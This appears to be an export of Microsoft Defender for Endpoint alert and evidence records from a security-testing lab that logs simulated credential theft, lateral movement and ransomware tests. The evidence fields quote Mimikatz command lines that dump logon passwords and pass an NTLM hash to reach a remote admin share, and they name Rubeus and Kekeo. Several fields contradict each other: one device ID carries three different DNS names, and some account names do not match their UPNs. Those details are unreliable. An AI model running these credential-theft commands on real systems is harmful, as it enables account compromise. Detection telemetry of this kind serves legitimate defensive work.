null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-22T08:49:09.35Z | Suspicious | None | jeff | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-16T09:08:30.79Z | Suspicious | None | svc_acct | NT AUTHORITY | S-1-5-18 | null | null | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | 8,912 | powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command "& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\AntiVirus.psm1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\AntiVirus.psm1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '1c0f9c9177787b3146332dd0f112444d3062214f6e71e1a4bc16b1fb55818a86')) { exit 323;};$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\EDR.psm1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\EDR.psm1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'f84b9499bd9dc40b993886d328828a2ed82541e54b76f9cb9e04c007eb97d8be')) { exit 323;};$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\Firewall.psm1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\Firewall.psm1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '2490d8e22c01e09f99c8e32a044d6c150e75e8e75028809f73fffd9d3bf4ed92')) { exit 323;};$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\GroupPolicyObject.psm1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\GroupPolicyObject.psm1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '5b251a22c68070bcb6be4c85e71232067581fa1483ce767e2e9fbe98a4db0229')) { exit 323;};$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\PolicyEnforcer.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\PolicyEnforcer.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '13ff49e1e4a5017ae784cbe39648f9f18af975c2ce9616d52d7d7b32bec05e50')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\PolicyEnforcer.ps1' }" | 2022-11-16T09:04:33.0593386Z | 7,224 | 2022-11-16T09:04:31.5834723Z | SenseCM.exe | C:\Program Files\Windows Defender Advanced Threat Protection | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-18T04:44:34.4Z | Suspicious | None | Takeshi | TMTOWER-BOOK | S-1-5-21-7316772-2057538409-3008203053-1001 | null | null | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 17,708 | whoami /all | 2022-11-18T04:38:53.2409808Z | 14,616 | 2022-11-14T04:36:16.5242809Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | 83b06aa80899050e5d4132992e36b5b8f14b64e9 |
da638072957042777108_1449090152 | 6d180a49-04df-4357-ba1c-67979b1be5d8 | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T08:48:24.2777282Z | 2022-12-22T08:54:54.5066667Z | null | 2022-12-22T08:47:22.2503604Z | 2022-12-22T08:47:23.7158614Z | Multiple dual-purpose tools were dropped | Multiple known public tools, which could also be used for malicious reasons were dropped on this device.
Attackers might download or copy multiple dual-purpose tools to the target device to perform various attack stages including, credential theft, privilege escalation, and lateral movement. | LateralMovement | New | High | 61 | PendingApproval | null | null | WindowsDefenderAtp | e0e0ea40-b5ca-4cbf-8380-24119951f847 | null | null | null | [
"T1003",
"T1021",
"T1105",
"T1555",
"T1558.003",
"T1570"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "malicious.io",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Inactive",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV8"
}
],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:48:24.58Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-22T08:48:24.58Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "PendingApproval",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-22T08:48:24.58Z",
"fileName": "Rubeus.exe",
"filePath": "C:\\M365DAttack\\Rubeus",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "PendingApproval",
"remediationStatusDetails": null,
"sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7",
"sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-22T08:48:24.58Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Clean"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-22T08:48:24.58Z",
"fileName": "Step3-PasstheHash.txt",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "db199c7f1cd3a95faeaac664e4f9a8f04c488a41",
"sha256": "2e8f1d9a05d208ee3ed9c256132c5d7a6fa88a3196d3ab08578ea5323b0853ea",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:48:24.58Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6324,
"processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit",
"processCreationTime": "2022-12-22T08:47:23.3350389Z",
"processId": 7772,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:48:24.58Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6324,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv8.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv8-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit",
"processCreationTime": "2022-12-22T08:47:23.6053625Z",
"processId": 9372,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:48:24.58Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:26:24.0772409Z",
"parentProcessFileName": "explorer.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 1896,
"processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Desktop'",
"processCreationTime": "2022-12-22T08:47:11.8139068Z",
"processId": 6324,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072966347760708_134501400 | 901dd607-1ad3-4be3-b546-4ffd48e8a90f | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T09:03:54.7760895Z | 2022-12-22T09:03:55.5666667Z | null | 2022-12-22T08:47:34.3612687Z | 2022-12-22T08:47:34.3612687Z | 'Kekeo' malware was detected | Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection. | Malware | New | Informational | 61 | PendingApproval | null | null | WindowsDefenderAv | d60f5b90-ecd8-4d77-8186-a801597ec762 | null | null | Kekeo | [] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "staging.net",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Inactive",
"loggedOnUsers": [],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-22T09:03:54.8033333Z",
"fileName": "Rubeus.exe",
"filePath": "C:\\M365DAttack\\Rubeus",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7",
"sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-18T05:13:01.0066667Z | Suspicious | None | user1 | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:11:51.46Z | Suspicious | None | alice | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1107 | 0808dea1-2ec8-41d2-8e3e-7c18309fab09 | steve@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638001152922652755_325913299 | 3d5763a4-89b4-4adc-a0f4-5b7d74b8ff4a | 486 | MicrosoftDefenderForEndpoint | 2022-09-30T06:14:52.2652956Z | 2022-11-19T01:35:42.7033333Z | 2022-10-01T01:36:00.5066667Z | 2022-09-30T06:11:52.2694305Z | 2022-09-30T06:13:05.4830293Z | Suspicious User Account Discovery | A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks. | Discovery | Resolved | Low | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | 9bfe28a9-21eb-4f8a-b51e-38ebd3650c88 | msftadmin@msdxv2.m365dpoc.com | null | null | [
"T1033",
"T1087",
"T1087.001"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "prod.env",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:14:52.3Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:14:52.3Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-09-30T06:11:13.210308Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4064,
"processCommandLine": "\"net.exe\" user /domain",
"processCreationTime": "2022-09-30T06:11:51.8945322Z",
"processId": 7588,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:14:52.3Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": "2022-08-23T12:17:37.8693453Z",
"parentProcessFileName": "explorer.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 4668,
"processCommandLine": "\"powershell.exe\" ",
"processCreationTime": "2022-09-30T06:11:13.210308Z",
"processId": 4064,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-12T07:38:15.09Z | Suspicious | None | hacker | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072963592774141_-165641504 | 2bb9ed0d-f18e-46c1-a2e9-72b2a1f7758a | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T08:59:19.2774369Z | 2022-12-22T08:59:19.8966667Z | null | 2022-12-22T08:47:53.1304775Z | 2022-12-22T08:47:53.1304775Z | Malicious credential theft tool execution detected | A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. | CredentialAccess | New | High | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | f5d3c5d8-ec3a-4412-ab45-934d8faff42c | null | null | null | [
"T1003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Medium",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:59:19.3466667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:13:50.9266667Z | Suspicious | None | operator | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T08:20:15.89Z | Benign | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638037710600189500_689836092 | 744c7672-fc58-4752-95af-69baf5202c36 | 707 | MicrosoftDefenderForEndpoint | 2022-11-11T13:44:20.0189812Z | 2022-11-12T01:35:43.1133333Z | 2022-11-12T01:35:42.9033333Z | 2022-11-11T13:30:23.3281462Z | 2022-11-11T13:30:23.3281462Z | 'Encryptest' ransomware was prevented | Ransomware use common methods to encrypt files using keys that are known only to attackers. As a result, victims are unable to access the contents of the encrypted files. Most ransomware display or drop a ransom note—an image or an HTML file that contains information about how to obtain the attacker-supplied decryption tool for a fee.
To target documents or other files that contain user data, some ransomware look for files in certain locations and files with certain extension names. It is also common for ransomware to rename encrypted files so that they all use the same extension name.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection. | Ransomware | Resolved | Medium | 42 | PartiallyRemediated | TruePositive | SecurityTesting | WindowsDefenderAv | 51d03c45-b142-4de4-95df-01b0c259d8f6 | takeshi@msdxv2.m365dpoc.com | null | Encryptest | [] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "takeshi-win10b.takeshi.m365dpoc.com",
"firstSeen": "2022-11-11T13:23:18.268Z",
"healthStatus": "Inactive",
"loggedOnUsers": [],
"mdatpDeviceId": "d358873e58e59dd581ae039d6adf230c0054adb0",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Low",
"tags": [],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/TAKESHI/providers/Microsoft.Compute/virtualMachines/TAKESHI-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "49207903-d8c3-49f8-848f-f33c41525edb"
}
}
] | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Prevented",
"deviceId": "d358873e58e59dd581ae039d6adf230c0054adb0",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-11T13:44:20.1Z",
"fileName": "ransomware_testfile_unsigned.exe",
"filePath": "C:\\M365DPoCLab\\Simulation Files\\Controlled Folder Access",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Prevented",
"remediationStatusDetails": "Entity was pre-remediated by Windows Defender",
"sha1": "34dfe1b9798d8c5a67490d0e5f84d2e1a6ba4004",
"sha256": "59086539186f7b7b814ed93f181c2a8040c0cc1b88cde1a219e4bbaaf568b073",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Prevented",
"deviceId": "d358873e58e59dd581ae039d6adf230c0054adb0",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-11T13:44:21.76Z",
"fileName": "UNSIGNED_ransomware_test_exe.exe",
"filePath": "C:\\M365DPoCLab\\Simulation Files\\Attack Surface Reduction\\Block Execution of untrusted or unsigned executables inside removable USB media",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Prevented",
"remediationStatusDetails": "Entity was pre-remediated by Windows Defender",
"sha1": "34dfe1b9798d8c5a67490d0e5f84d2e1a6ba4004",
"sha256": "59086539186f7b7b814ed93f181c2a8040c0cc1b88cde1a219e4bbaaf568b073",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T17:23:28.5433333Z | Suspicious | None | admin | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
